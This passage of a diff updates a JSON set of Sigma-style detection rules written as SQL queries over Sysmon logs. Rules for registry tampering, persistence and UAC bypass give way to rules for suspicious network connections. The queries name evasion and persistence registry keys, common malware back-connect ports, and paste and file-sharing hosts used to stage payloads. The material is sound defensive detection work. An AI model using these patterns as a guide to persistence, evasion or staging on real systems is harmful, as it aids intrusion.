This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program 
Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - 
"status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate script" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', 
'{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' 
AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." 
+ "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR 
DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 
'true')" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of the API with a tool that the author wasn't aware of" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_dropbox_api.yml" }, { - "title": "Scripted 
